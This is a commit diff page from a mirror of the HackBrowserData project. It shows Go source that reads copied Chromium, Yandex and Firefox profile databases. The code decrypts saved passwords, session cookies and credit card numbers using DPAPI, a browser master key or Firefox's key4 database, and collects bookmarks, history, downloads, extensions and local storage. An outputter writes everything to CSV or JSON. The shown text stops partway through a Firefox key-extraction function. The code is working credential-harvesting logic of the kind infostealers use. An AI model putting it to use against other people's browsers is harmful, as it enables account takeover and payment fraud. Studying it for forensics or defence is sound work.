CalvinBackup/HackBrowserData
1
0
Fork 0
mirror of https://github.com/moonD4rk/HackBrowserData.git synced 2026-05-19 18:58:03 +02:00
Code Issues Packages Projects Releases Wiki Activity

chore: update project layout

Browse Source
This commit is contained in:
moonD4rk
2023-03-10 14:52:26 +08:00
parent 9850624d45
commit b65d3186c4
36 changed files with 181 additions and 179 deletions
Download Patch File Download Diff File Expand all files Collapse all files
browingdata/bookmark/bookmark.go
+152
View File
@@ -0,0 +1,152 @@
package bookmark
import (
"database/sql"
"os"
"sort"
"time"
// import sqlite3 driver
_ "github.com/mattn/go-sqlite3"
"github.com/tidwall/gjson"
"github.com/moond4rk/HackBrowserData/item"
"github.com/moond4rk/HackBrowserData/log"
"github.com/moond4rk/HackBrowserData/utils/fileutil"
"github.com/moond4rk/HackBrowserData/utils/typeutil"
)
type ChromiumBookmark []bookmark
type bookmark struct {
ID int64
Name string
Type string
URL string
DateAdded time.Time
}
func (c *ChromiumBookmark) Parse(masterKey []byte) error {
bookmarks, err := fileutil.ReadFile(item.TempChromiumBookmark)
if err != nil {
return err
}
defer os.Remove(item.TempChromiumBookmark)
r := gjson.Parse(bookmarks)
if r.Exists() {
roots := r.Get("roots")
roots.ForEach(func(key, value gjson.Result) bool {
getBookmarkChildren(value, c)
return true
})
}
// TODO: refactor with go generics
sort.Slice(*c, func(i, j int) bool {
return (*c)[i].DateAdded.After((*c)[j].DateAdded)
})
return nil
}
func getBookmarkChildren(value gjson.Result, w *ChromiumBookmark) (children gjson.Result) {
const (
bookmarkID = "id"
bookmarkAdded = "date_added"
bookmarkURL = "url"
bookmarkName = "name"
bookmarkType = "type"
bookmarkChildren = "children"
)
nodeType := value.Get(bookmarkType)
bm := bookmark{
ID: value.Get(bookmarkID).Int(),
Name: value.Get(bookmarkName).String(),
URL: value.Get(bookmarkURL).String(),
DateAdded: typeutil.TimeEpoch(value.Get(bookmarkAdded).Int()),
}
children = value.Get(bookmarkChildren)
if nodeType.Exists() {
bm.Type = nodeType.String()
*w = append(*w, bm)
if children.Exists() && children.IsArray() {
for _, v := range children.Array() {
children = getBookmarkChildren(v, w)
}
}
}
return children
}
func bookmarkType(a int64) string {
switch a {
case 1:
return "url"
default:
return "folder"
}
}
func (c *ChromiumBookmark) Name() string {
return "bookmark"
}
func (c *ChromiumBookmark) Length() int {
return len(*c)
}
type FirefoxBookmark []bookmark
const (
queryFirefoxBookMark = `SELECT id, url, type, dateAdded, title FROM (SELECT * FROM moz_bookmarks INNER JOIN moz_places ON moz_bookmarks.fk=moz_places.id)`
closeJournalMode = `PRAGMA journal_mode=off`
)
func (f *FirefoxBookmark) Parse(masterKey []byte) error {
var (
err error
keyDB *sql.DB
bookmarkRows *sql.Rows
)
keyDB, err = sql.Open("sqlite3", item.TempFirefoxBookmark)
if err != nil {
return err
}
defer os.Remove(item.TempFirefoxBookmark)
defer keyDB.Close()
_, err = keyDB.Exec(closeJournalMode)
if err != nil {
log.Error(err)
}
bookmarkRows, err = keyDB.Query(queryFirefoxBookMark)
if err != nil {
return err
}
defer bookmarkRows.Close()
for bookmarkRows.Next() {
var (
id, bType, dateAdded int64
title, url string
)
if err = bookmarkRows.Scan(&id, &url, &bType, &dateAdded, &title); err != nil {
log.Warn(err)
}
*f = append(*f, bookmark{
ID: id,
Name: title,
Type: bookmarkType(bType),
URL: url,
DateAdded: typeutil.TimeStamp(dateAdded / 1000000),
})
}
sort.Slice(*f, func(i, j int) bool {
return (*f)[i].DateAdded.After((*f)[j].DateAdded)
})
return nil
}
func (f *FirefoxBookmark) Name() string {
return "bookmark"
}
func (f *FirefoxBookmark) Length() int {
return len(*f)
}
browingdata/browsingdata.go
+114
View File
@@ -0,0 +1,114 @@
package browingdata
import (
"path"
"github.com/moond4rk/HackBrowserData/browingdata/bookmark"
"github.com/moond4rk/HackBrowserData/browingdata/cookie"
"github.com/moond4rk/HackBrowserData/browingdata/creditcard"
"github.com/moond4rk/HackBrowserData/browingdata/download"
"github.com/moond4rk/HackBrowserData/browingdata/extension"
"github.com/moond4rk/HackBrowserData/browingdata/history"
"github.com/moond4rk/HackBrowserData/browingdata/localstorage"
"github.com/moond4rk/HackBrowserData/browingdata/password"
"github.com/moond4rk/HackBrowserData/item"
"github.com/moond4rk/HackBrowserData/log"
"github.com/moond4rk/HackBrowserData/utils/fileutil"
)
type Data struct {
sources map[item.Item]Source
}
type Source interface {
Parse(masterKey []byte) error
Name() string
Length() int
}
func New(sources []item.Item) *Data {
bd := &Data{
sources: make(map[item.Item]Source),
}
bd.addSource(sources)
return bd
}
func (d *Data) Recovery(masterKey []byte) error {
for _, source := range d.sources {
if err := source.Parse(masterKey); err != nil {
log.Errorf("parse %s error %s", source.Name(), err.Error())
}
}
return nil
}
func (d *Data) Output(dir, browserName, flag string) {
output := NewOutPutter(flag)
for _, source := range d.sources {
if source.Length() == 0 {
// if the length of the export data is 0, then it is not necessary to output
continue
}
filename := fileutil.ItemName(browserName, source.Name(), output.Ext())
f, err := output.CreateFile(dir, filename)
if err != nil {
log.Errorf("create file %s error %s", filename, err.Error())
continue
}
if err := output.Write(source, f); err != nil {
log.Errorf("write to file %s error %s", filename, err.Error())
continue
}
if err := f.Close(); err != nil {
log.Errorf("close file %s error %s", filename, err.Error())
continue
}
log.Noticef("output to file %s success", path.Join(dir, filename))
}
}
func (d *Data) addSource(Sources []item.Item) {
for _, source := range Sources {
switch source {
case item.ChromiumPassword:
d.sources[source] = &password.ChromiumPassword{}
case item.ChromiumCookie:
d.sources[source] = &cookie.ChromiumCookie{}
case item.ChromiumBookmark:
d.sources[source] = &bookmark.ChromiumBookmark{}
case item.ChromiumHistory:
d.sources[source] = &history.ChromiumHistory{}
case item.ChromiumDownload:
d.sources[source] = &download.ChromiumDownload{}
case item.ChromiumCreditCard:
d.sources[source] = &creditcard.ChromiumCreditCard{}
case item.ChromiumLocalStorage:
d.sources[source] = &localstorage.ChromiumLocalStorage{}
case item.ChromiumExtension:
d.sources[source] = &extension.ChromiumExtension{}
case item.YandexPassword:
d.sources[source] = &password.YandexPassword{}
case item.YandexCreditCard:
d.sources[source] = &creditcard.YandexCreditCard{}
case item.FirefoxPassword:
d.sources[source] = &password.FirefoxPassword{}
case item.FirefoxCookie:
d.sources[source] = &cookie.FirefoxCookie{}
case item.FirefoxBookmark:
d.sources[source] = &bookmark.FirefoxBookmark{}
case item.FirefoxHistory:
d.sources[source] = &history.FirefoxHistory{}
case item.FirefoxDownload:
d.sources[source] = &download.FirefoxDownload{}
case item.FirefoxLocalStorage:
d.sources[source] = &localstorage.FirefoxLocalStorage{}
case item.FirefoxExtension:
d.sources[source] = &extension.FirefoxExtension{}
}
}
}
browingdata/cookie/cookie.go
+148
View File
@@ -0,0 +1,148 @@
package cookie
import (
"database/sql"
"os"
"sort"
"time"
// import sqlite3 driver
_ "github.com/mattn/go-sqlite3"
"github.com/moond4rk/HackBrowserData/crypto"
"github.com/moond4rk/HackBrowserData/item"
"github.com/moond4rk/HackBrowserData/log"
"github.com/moond4rk/HackBrowserData/utils/typeutil"
)
type ChromiumCookie []cookie
type cookie struct {
Host string
Path string
KeyName string
encryptValue []byte
Value string
IsSecure bool
IsHTTPOnly bool
HasExpire bool
IsPersistent bool
CreateDate time.Time
ExpireDate time.Time
}
const (
queryChromiumCookie = `SELECT name, encrypted_value, host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires, is_persistent FROM cookies`
)
func (c *ChromiumCookie) Parse(masterKey []byte) error {
cookieDB, err := sql.Open("sqlite3", item.TempChromiumCookie)
if err != nil {
return err
}
defer os.Remove(item.TempChromiumCookie)
defer cookieDB.Close()
rows, err := cookieDB.Query(queryChromiumCookie)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
key, host, path string
isSecure, isHTTPOnly, hasExpire, isPersistent int
createDate, expireDate int64
value, encryptValue []byte
)
if err = rows.Scan(&key, &encryptValue, &host, &path, &createDate, &expireDate, &isSecure, &isHTTPOnly, &hasExpire, &isPersistent); err != nil {
log.Warn(err)
}
cookie := cookie{
KeyName: key,
Host: host,
Path: path,
encryptValue: encryptValue,
IsSecure: typeutil.IntToBool(isSecure),
IsHTTPOnly: typeutil.IntToBool(isHTTPOnly),
HasExpire: typeutil.IntToBool(hasExpire),
IsPersistent: typeutil.IntToBool(isPersistent),
CreateDate: typeutil.TimeEpoch(createDate),
ExpireDate: typeutil.TimeEpoch(expireDate),
}
if len(encryptValue) > 0 {
var err error
if masterKey == nil {
value, err = crypto.DPAPI(encryptValue)
} else {
value, err = crypto.Chromium(masterKey, encryptValue)
}
if err != nil {
log.Error(err)
}
}
cookie.Value = string(value)
*c = append(*c, cookie)
}
sort.Slice(*c, func(i, j int) bool {
return (*c)[i].CreateDate.After((*c)[j].CreateDate)
})
return nil
}
func (c *ChromiumCookie) Name() string {
return "cookie"
}
func (c *ChromiumCookie) Length() int {
return len(*c)
}
type FirefoxCookie []cookie
const (
queryFirefoxCookie = `SELECT name, value, host, path, creationTime, expiry, isSecure, isHttpOnly FROM moz_cookies`
)
func (f *FirefoxCookie) Parse(masterKey []byte) error {
cookieDB, err := sql.Open("sqlite3", item.TempFirefoxCookie)
if err != nil {
return err
}
defer os.Remove(item.TempFirefoxCookie)
defer cookieDB.Close()
rows, err := cookieDB.Query(queryFirefoxCookie)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
name, value, host, path string
isSecure, isHTTPOnly int
creationTime, expiry int64
)
if err = rows.Scan(&name, &value, &host, &path, &creationTime, &expiry, &isSecure, &isHTTPOnly); err != nil {
log.Warn(err)
}
*f = append(*f, cookie{
KeyName: name,
Host: host,
Path: path,
IsSecure: typeutil.IntToBool(isSecure),
IsHTTPOnly: typeutil.IntToBool(isHTTPOnly),
CreateDate: typeutil.TimeStamp(creationTime / 1000000),
ExpireDate: typeutil.TimeStamp(expiry),
Value: value,
})
}
return nil
}
func (f *FirefoxCookie) Name() string {
return "cookie"
}
func (f *FirefoxCookie) Length() int {
return len(*f)
}
browingdata/creditcard/creditcard.go
+138
View File
@@ -0,0 +1,138 @@
package creditcard
import (
"database/sql"
"os"
// import sqlite3 driver
_ "github.com/mattn/go-sqlite3"
"github.com/moond4rk/HackBrowserData/crypto"
"github.com/moond4rk/HackBrowserData/item"
"github.com/moond4rk/HackBrowserData/log"
)
type ChromiumCreditCard []card
type card struct {
GUID string
Name string
ExpirationYear string
ExpirationMonth string
CardNumber string
Address string
NickName string
}
const (
queryChromiumCredit = `SELECT guid, name_on_card, expiration_month, expiration_year, card_number_encrypted, billing_address_id, nickname FROM credit_cards`
)
func (c *ChromiumCreditCard) Parse(masterKey []byte) error {
creditDB, err := sql.Open("sqlite3", item.TempChromiumCreditCard)
if err != nil {
return err
}
defer os.Remove(item.TempChromiumCreditCard)
defer creditDB.Close()
rows, err := creditDB.Query(queryChromiumCredit)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
name, month, year, guid, address, nickname string
value, encryptValue []byte
)
if err := rows.Scan(&guid, &name, &month, &year, &encryptValue, &address, &nickname); err != nil {
log.Warn(err)
}
ccInfo := card{
GUID: guid,
Name: name,
ExpirationMonth: month,
ExpirationYear: year,
Address: address,
NickName: nickname,
}
if masterKey == nil {
value, err = crypto.DPAPI(encryptValue)
if err != nil {
return err
}
} else {
value, err = crypto.Chromium(masterKey, encryptValue)
if err != nil {
return err
}
}
ccInfo.CardNumber = string(value)
*c = append(*c, ccInfo)
}
return nil
}
func (c *ChromiumCreditCard) Name() string {
return "creditcard"
}
func (c *ChromiumCreditCard) Length() int {
return len(*c)
}
type YandexCreditCard []card
func (c *YandexCreditCard) Parse(masterKey []byte) error {
creditDB, err := sql.Open("sqlite3", item.TempYandexCreditCard)
if err != nil {
return err
}
defer os.Remove(item.TempYandexCreditCard)
defer creditDB.Close()
defer creditDB.Close()
rows, err := creditDB.Query(queryChromiumCredit)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
name, month, year, guid, address, nickname string
value, encryptValue []byte
)
if err := rows.Scan(&guid, &name, &month, &year, &encryptValue, &address, &nickname); err != nil {
log.Warn(err)
}
ccInfo := card{
GUID: guid,
Name: name,
ExpirationMonth: month,
ExpirationYear: year,
Address: address,
NickName: nickname,
}
if masterKey == nil {
value, err = crypto.DPAPI(encryptValue)
if err != nil {
return err
}
} else {
value, err = crypto.Chromium(masterKey, encryptValue)
if err != nil {
return err
}
}
ccInfo.CardNumber = string(value)
*c = append(*c, ccInfo)
}
return nil
}
func (c *YandexCreditCard) Name() string {
return "creditcard"
}
func (c *YandexCreditCard) Length() int {
return len(*c)
}
browingdata/download/download.go
+142
View File
@@ -0,0 +1,142 @@
package download
import (
"database/sql"
"os"
"sort"
"strings"
"time"
// import sqlite3 driver
_ "github.com/mattn/go-sqlite3"
"github.com/tidwall/gjson"
"github.com/moond4rk/HackBrowserData/item"
"github.com/moond4rk/HackBrowserData/log"
"github.com/moond4rk/HackBrowserData/utils/typeutil"
)
type ChromiumDownload []download
type download struct {
TargetPath string
URL string
TotalBytes int64
StartTime time.Time
EndTime time.Time
MimeType string
}
const (
queryChromiumDownload = `SELECT target_path, tab_url, total_bytes, start_time, end_time, mime_type FROM downloads`
)
func (c *ChromiumDownload) Parse(masterKey []byte) error {
historyDB, err := sql.Open("sqlite3", item.TempChromiumDownload)
if err != nil {
return err
}
defer os.Remove(item.TempChromiumDownload)
defer historyDB.Close()
rows, err := historyDB.Query(queryChromiumDownload)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
targetPath, tabURL, mimeType string
totalBytes, startTime, endTime int64
)
if err := rows.Scan(&targetPath, &tabURL, &totalBytes, &startTime, &endTime, &mimeType); err != nil {
log.Warn(err)
}
data := download{
TargetPath: targetPath,
URL: tabURL,
TotalBytes: totalBytes,
StartTime: typeutil.TimeEpoch(startTime),
EndTime: typeutil.TimeEpoch(endTime),
MimeType: mimeType,
}
*c = append(*c, data)
}
sort.Slice(*c, func(i, j int) bool {
return (*c)[i].TotalBytes > (*c)[j].TotalBytes
})
return nil
}
func (c *ChromiumDownload) Name() string {
return "download"
}
func (c *ChromiumDownload) Length() int {
return len(*c)
}
type FirefoxDownload []download
const (
queryFirefoxDownload = `SELECT place_id, GROUP_CONCAT(content), url, dateAdded FROM (SELECT * FROM moz_annos INNER JOIN moz_places ON moz_annos.place_id=moz_places.id) t GROUP BY place_id`
closeJournalMode = `PRAGMA journal_mode=off`
)
func (f *FirefoxDownload) Parse(masterKey []byte) error {
var (
err error
keyDB *sql.DB
downloadRows *sql.Rows
)
keyDB, err = sql.Open("sqlite3", item.TempFirefoxDownload)
if err != nil {
return err
}
defer os.Remove(item.TempFirefoxDownload)
defer keyDB.Close()
_, err = keyDB.Exec(closeJournalMode)
if err != nil {
return err
}
defer keyDB.Close()
downloadRows, err = keyDB.Query(queryFirefoxDownload)
if err != nil {
return err
}
defer downloadRows.Close()
for downloadRows.Next() {
var (
content, url string
placeID, dateAdded int64
)
if err = downloadRows.Scan(&placeID, &content, &url, &dateAdded); err != nil {
log.Warn(err)
}
contentList := strings.Split(content, ",{")
if len(contentList) > 1 {
path := contentList[0]
json := "{" + contentList[1]
endTime := gjson.Get(json, "endTime")
fileSize := gjson.Get(json, "fileSize")
*f = append(*f, download{
TargetPath: path,
URL: url,
TotalBytes: fileSize.Int(),
StartTime: typeutil.TimeStamp(dateAdded / 1000000),
EndTime: typeutil.TimeStamp(endTime.Int() / 1000),
})
}
}
sort.Slice(*f, func(i, j int) bool {
return (*f)[i].TotalBytes < (*f)[j].TotalBytes
})
return nil
}
func (f *FirefoxDownload) Name() string {
return "download"
}
func (f *FirefoxDownload) Length() int {
return len(*f)
}
browingdata/extension/extension.go
+83
View File
@@ -0,0 +1,83 @@
package extension
import (
"os"
"github.com/tidwall/gjson"
"github.com/moond4rk/HackBrowserData/item"
"github.com/moond4rk/HackBrowserData/log"
"github.com/moond4rk/HackBrowserData/utils/fileutil"
)
type ChromiumExtension []*extension
type extension struct {
Name string
Description string
Version string
HomepageURL string
}
const (
manifest = "manifest.json"
)
func (c *ChromiumExtension) Parse(masterKey []byte) error {
files, err := fileutil.FilesInFolder(item.TempChromiumExtension, manifest)
if err != nil {
return err
}
defer os.RemoveAll(item.TempChromiumExtension)
for _, f := range files {
file, err := fileutil.ReadFile(f)
if err != nil {
log.Error("Failed to read file: %s", err)
continue
}
b := gjson.Parse(file)
*c = append(*c, &extension{
Name: b.Get("name").String(),
Description: b.Get("description").String(),
Version: b.Get("version").String(),
HomepageURL: b.Get("homepage_url").String(),
})
}
return nil
}
func (c *ChromiumExtension) Name() string {
return "extension"
}
func (c *ChromiumExtension) Length() int {
return len(*c)
}
type FirefoxExtension []*extension
func (f *FirefoxExtension) Parse(masterKey []byte) error {
s, err := fileutil.ReadFile(item.TempFirefoxExtension)
if err != nil {
return err
}
defer os.Remove(item.TempFirefoxExtension)
j := gjson.Parse(s)
for _, v := range j.Get("addons").Array() {
*f = append(*f, &extension{
Name: v.Get("defaultLocale.name").String(),
Description: v.Get("defaultLocale.description").String(),
Version: v.Get("version").String(),
HomepageURL: v.Get("defaultLocale.homepageURL").String(),
})
}
return nil
}
func (f *FirefoxExtension) Name() string {
return "extension"
}
func (f *FirefoxExtension) Length() int {
return len(*f)
}
browingdata/history/history.go
+130
View File
@@ -0,0 +1,130 @@
package history
import (
"database/sql"
"os"
"sort"
"time"
// import sqlite3 driver
_ "github.com/mattn/go-sqlite3"
"github.com/moond4rk/HackBrowserData/item"
"github.com/moond4rk/HackBrowserData/log"
"github.com/moond4rk/HackBrowserData/utils/typeutil"
)
type ChromiumHistory []history
type history struct {
Title string
URL string
VisitCount int
LastVisitTime time.Time
}
const (
queryChromiumHistory = `SELECT url, title, visit_count, last_visit_time FROM urls`
)
func (c *ChromiumHistory) Parse(masterKey []byte) error {
historyDB, err := sql.Open("sqlite3", item.TempChromiumHistory)
if err != nil {
return err
}
defer os.Remove(item.TempChromiumHistory)
defer historyDB.Close()
rows, err := historyDB.Query(queryChromiumHistory)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
url, title string
visitCount int
lastVisitTime int64
)
if err := rows.Scan(&url, &title, &visitCount, &lastVisitTime); err != nil {
log.Warn(err)
}
data := history{
URL: url,
Title: title,
VisitCount: visitCount,
LastVisitTime: typeutil.TimeEpoch(lastVisitTime),
}
*c = append(*c, data)
}
sort.Slice(*c, func(i, j int) bool {
return (*c)[i].VisitCount > (*c)[j].VisitCount
})
return nil
}
func (c *ChromiumHistory) Name() string {
return "history"
}
func (c *ChromiumHistory) Length() int {
return len(*c)
}
type FirefoxHistory []history
const (
queryFirefoxHistory = `SELECT id, url, COALESCE(last_visit_date, 0), COALESCE(title, ''), visit_count FROM moz_places`
closeJournalMode = `PRAGMA journal_mode=off`
)
func (f *FirefoxHistory) Parse(masterKey []byte) error {
var (
err error
keyDB *sql.DB
historyRows *sql.Rows
)
keyDB, err = sql.Open("sqlite3", item.TempFirefoxHistory)
if err != nil {
return err
}
defer os.Remove(item.TempFirefoxHistory)
defer keyDB.Close()
_, err = keyDB.Exec(closeJournalMode)
if err != nil {
return err
}
defer keyDB.Close()
historyRows, err = keyDB.Query(queryFirefoxHistory)
if err != nil {
return err
}
defer historyRows.Close()
for historyRows.Next() {
var (
id, visitDate int64
url, title string
visitCount int
)
if err = historyRows.Scan(&id, &url, &visitDate, &title, &visitCount); err != nil {
log.Warn(err)
}
*f = append(*f, history{
Title: title,
URL: url,
VisitCount: visitCount,
LastVisitTime: typeutil.TimeStamp(visitDate / 1000000),
})
}
sort.Slice(*f, func(i, j int) bool {
return (*f)[i].VisitCount < (*f)[j].VisitCount
})
return nil
}
func (f *FirefoxHistory) Name() string {
return "history"
}
func (f *FirefoxHistory) Length() int {
return len(*f)
}
browingdata/localstorage/localstorage.go
+152
View File
@@ -0,0 +1,152 @@
package localstorage
import (
"bytes"
"database/sql"
"fmt"
"os"
"strings"
"github.com/syndtr/goleveldb/leveldb"
"github.com/moond4rk/HackBrowserData/item"
"github.com/moond4rk/HackBrowserData/log"
"github.com/moond4rk/HackBrowserData/utils/typeutil"
)
type ChromiumLocalStorage []storage
type storage struct {
IsMeta bool
URL string
Key string
Value string
}
func (c *ChromiumLocalStorage) Parse(masterKey []byte) error {
db, err := leveldb.OpenFile(item.TempChromiumLocalStorage, nil)
if err != nil {
return err
}
defer os.RemoveAll(item.TempChromiumLocalStorage)
// log.Info("parsing local storage now")
defer db.Close()
iter := db.NewIterator(nil, nil)
for iter.Next() {
key := iter.Key()
value := iter.Value()
// don't parse value upper than 5kB
if len(value) > 1024*5 {
continue
}
s := new(storage)
s.fillKey(key)
s.fillValue(value)
// don't save meta data
if s.IsMeta {
continue
}
*c = append(*c, *s)
}
iter.Release()
err = iter.Error()
return err
}
func (c *ChromiumLocalStorage) Name() string {
return "localStorage"
}
func (c *ChromiumLocalStorage) Length() int {
return len(*c)
}
func (s *storage) fillKey(b []byte) {
keys := bytes.Split(b, []byte("\x00"))
if len(keys) == 1 && bytes.HasPrefix(keys[0], []byte("META:")) {
s.IsMeta = true
s.fillMetaHeader(keys[0])
}
if len(keys) == 2 && bytes.HasPrefix(keys[0], []byte("_")) {
s.fillHeader(keys[0], keys[1])
}
}
func (s *storage) fillMetaHeader(b []byte) {
s.URL = string(bytes.Trim(b, "META:"))
}
func (s *storage) fillHeader(url, key []byte) {
s.URL = string(bytes.Trim(url, "_"))
s.Key = string(bytes.Trim(key, "\x01"))
}
// fillValue fills value of the storage
// TODO: support unicode charter
func (s *storage) fillValue(b []byte) {
t := fmt.Sprintf("%c", b)
m := strings.NewReplacer(" ", "", "\x00", "", "\x01", "").Replace(t)
s.Value = m
}
type FirefoxLocalStorage []storage
const (
queryFirefoxHistory = `SELECT originKey, key, value FROM webappsstore2`
closeJournalMode = `PRAGMA journal_mode=off`
)
func (f *FirefoxLocalStorage) Parse(masterKey []byte) error {
db, err := sql.Open("sqlite3", item.TempFirefoxLocalStorage)
if err != nil {
return err
}
if err != nil {
return err
}
defer os.Remove(item.TempFirefoxLocalStorage)
defer db.Close()
_, err = db.Exec(closeJournalMode)
if err != nil {
return err
}
defer db.Close()
rows, err := db.Query(queryFirefoxHistory)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var originKey, key, value string
if err = rows.Scan(&originKey, &key, &value); err != nil {
log.Warn(err)
}
s := new(storage)
s.fillFirefox(originKey, key, value)
*f = append(*f, *s)
}
return nil
}
func (s *storage) fillFirefox(originKey, key, value string) {
// originKey = moc.buhtig.:https:443
p := strings.Split(originKey, ":")
h := typeutil.Reverse([]byte(p[0]))
if bytes.HasPrefix(h, []byte(".")) {
h = h[1:]
}
if len(p) == 3 {
s.URL = fmt.Sprintf("%s://%s:%s", p[1], string(h), p[2])
}
s.Key = key
s.Value = value
}
func (f *FirefoxLocalStorage) Name() string {
return "localStorage"
}
func (f *FirefoxLocalStorage) Length() int {
return len(*f)
}
browingdata/outputter.go
+77
View File
@@ -0,0 +1,77 @@
package browingdata
import (
"encoding/csv"
"encoding/json"
"errors"
"io"
"os"
"path/filepath"
"github.com/gocarina/gocsv"
"golang.org/x/text/encoding/unicode"
"golang.org/x/text/transform"
)
type OutPutter struct {
json bool
csv bool
}
func NewOutPutter(flag string) *OutPutter {
o := &OutPutter{}
if flag == "json" {
o.json = true
} else {
o.csv = true
}
return o
}
func (o *OutPutter) Write(data Source, writer io.Writer) error {
switch o.json {
case true:
encoder := json.NewEncoder(writer)
encoder.SetIndent(" ", " ")
encoder.SetEscapeHTML(false)
return encoder.Encode(data)
default:
gocsv.SetCSVWriter(func(w io.Writer) *gocsv.SafeCSVWriter {
writer := csv.NewWriter(transform.NewWriter(w, unicode.UTF8BOM.NewEncoder()))
writer.Comma = ','
return gocsv.NewSafeCSVWriter(writer)
})
return gocsv.Marshal(data, writer)
}
}
func (o *OutPutter) CreateFile(dir, filename string) (*os.File, error) {
if filename == "" {
return nil, errors.New("empty filename")
}
if dir != "" {
if _, err := os.Stat(dir); os.IsNotExist(err) {
err := os.MkdirAll(dir, 0o750)
if err != nil {
return nil, err
}
}
}
var file *os.File
var err error
p := filepath.Join(dir, filename)
file, err = os.OpenFile(filepath.Clean(p), os.O_TRUNC|os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0o600)
if err != nil {
return nil, err
}
return file, nil
}
func (o *OutPutter) Ext() string {
if o.json {
return "json"
}
return "csv"
}
browingdata/outputter_test.go
+23
View File
@@ -0,0 +1,23 @@
package browingdata
import (
"os"
"testing"
)
func TestNewOutPutter(t *testing.T) {
t.Parallel()
out := NewOutPutter("json")
if out == nil {
t.Error("New() returned nil")
}
f, err := out.CreateFile("results", "test.json")
if err != nil {
t.Error("CreateFile() returned an error", err)
}
defer os.RemoveAll("results")
err = out.Write(nil, f)
if err != nil {
t.Error("Write() returned an error", err)
}
}
browingdata/password/password.go
+292
View File
@@ -0,0 +1,292 @@
package password
import (
"bytes"
"database/sql"
"encoding/base64"
"os"
"sort"
"time"
// import sqlite3 driver
_ "github.com/mattn/go-sqlite3"
"github.com/tidwall/gjson"
"github.com/moond4rk/HackBrowserData/crypto"
"github.com/moond4rk/HackBrowserData/item"
"github.com/moond4rk/HackBrowserData/log"
"github.com/moond4rk/HackBrowserData/utils/typeutil"
)
type ChromiumPassword []loginData
type loginData struct {
UserName string
encryptPass []byte
encryptUser []byte
Password string
LoginURL string
CreateDate time.Time
}
const (
queryChromiumLogin = `SELECT origin_url, username_value, password_value, date_created FROM logins`
)
func (c *ChromiumPassword) Parse(masterKey []byte) error {
loginDB, err := sql.Open("sqlite3", item.TempChromiumPassword)
if err != nil {
return err
}
defer os.Remove(item.TempChromiumPassword)
defer loginDB.Close()
rows, err := loginDB.Query(queryChromiumLogin)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
url, username string
pwd, password []byte
create int64
)
if err := rows.Scan(&url, &username, &pwd, &create); err != nil {
log.Warn(err)
}
login := loginData{
UserName: username,
encryptPass: pwd,
LoginURL: url,
}
if len(pwd) > 0 {
var err error
if masterKey == nil {
password, err = crypto.DPAPI(pwd)
} else {
password, err = crypto.Chromium(masterKey, pwd)
}
if err != nil {
log.Error(err)
}
}
if create > time.Now().Unix() {
login.CreateDate = typeutil.TimeEpoch(create)
} else {
login.CreateDate = typeutil.TimeStamp(create)
}
login.Password = string(password)
*c = append(*c, login)
}
// sort with create date
sort.Slice(*c, func(i, j int) bool {
return (*c)[i].CreateDate.After((*c)[j].CreateDate)
})
return nil
}
func (c *ChromiumPassword) Name() string {
return "password"
}
func (c *ChromiumPassword) Length() int {
return len(*c)
}
type YandexPassword []loginData
const (
queryYandexLogin = `SELECT action_url, username_value, password_value, date_created FROM logins`
)
func (c *YandexPassword) Parse(masterKey []byte) error {
loginDB, err := sql.Open("sqlite3", item.TempYandexPassword)
if err != nil {
return err
}
defer os.Remove(item.TempYandexPassword)
defer loginDB.Close()
rows, err := loginDB.Query(queryYandexLogin)
if err != nil {
return err
}
defer rows.Close()
for rows.Next() {
var (
url, username string
pwd, password []byte
create int64
)
if err := rows.Scan(&url, &username, &pwd, &create); err != nil {
log.Warn(err)
}
login := loginData{
UserName: username,
encryptPass: pwd,
LoginURL: url,
}
if len(pwd) > 0 {
var err error
if masterKey == nil {
password, err = crypto.DPAPI(pwd)
} else {
password, err = crypto.Chromium(masterKey, pwd)
}
if err != nil {
log.Errorf("decrypt yandex password error %s", err)
}
}
if create > time.Now().Unix() {
login.CreateDate = typeutil.TimeEpoch(create)
} else {
login.CreateDate = typeutil.TimeStamp(create)
}
login.Password = string(password)
*c = append(*c, login)
}
// sort with create date
sort.Slice(*c, func(i, j int) bool {
return (*c)[i].CreateDate.After((*c)[j].CreateDate)
})
return nil
}
func (c *YandexPassword) Name() string {
return "password"
}
func (c *YandexPassword) Length() int {
return len(*c)
}
type FirefoxPassword []loginData
const (
queryMetaData = `SELECT item1, item2 FROM metaData WHERE id = 'password'`
queryNssPrivate = `SELECT a11, a102 from nssPrivate`
)
func (f *FirefoxPassword) Parse(masterKey []byte) error {
globalSalt, metaBytes, nssA11, nssA102, err := getFirefoxDecryptKey(item.TempFirefoxKey4)
if err != nil {
return err
}
metaPBE, err := crypto.NewASN1PBE(metaBytes)
if err != nil {
return err
}
k, err := metaPBE.Decrypt(globalSalt, masterKey)
if err != nil {
return err
}
keyLin := []byte{248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1}
if bytes.Contains(k, []byte("password-check")) {
m := bytes.Compare(nssA102, keyLin)
if m == 0 {
nssPBE, err := crypto.NewASN1PBE(nssA11)
if err != nil {
return err
}
finallyKey, err := nssPBE.Decrypt(globalSalt, masterKey)
finallyKey = finallyKey[:24]
if err != nil {
return err
}
allLogin, err := getFirefoxLoginData()
if err != nil {
return err
}
for _, v := range allLogin {
userPBE, err := crypto.NewASN1PBE(v.encryptUser)
if err != nil {
return err
}
pwdPBE, err := crypto.NewASN1PBE(v.encryptPass)
if err != nil {
return err
}
user, err := userPBE.Decrypt(finallyKey, masterKey)
if err != nil {
return err
}
pwd, err := pwdPBE.Decrypt(finallyKey, masterKey)
if err != nil {
return err
}
*f = append(*f, loginData{
LoginURL: v.LoginURL,
UserName: string(user),
Password: string(pwd),
CreateDate: v.CreateDate,
})
}
}
}
sort.Slice(*f, func(i, j int) bool {
return (*f)[i].CreateDate.After((*f)[j].CreateDate)
})
return nil
}
func getFirefoxDecryptKey(key4file string) (item1, item2, a11, a102 []byte, err error) {
var keyDB *sql.DB
keyDB, err = sql.Open("sqlite3", key4file)
if err != nil {
return nil, nil, nil, nil, err
}
defer os.Remove(key4file)
defer keyDB.Close()
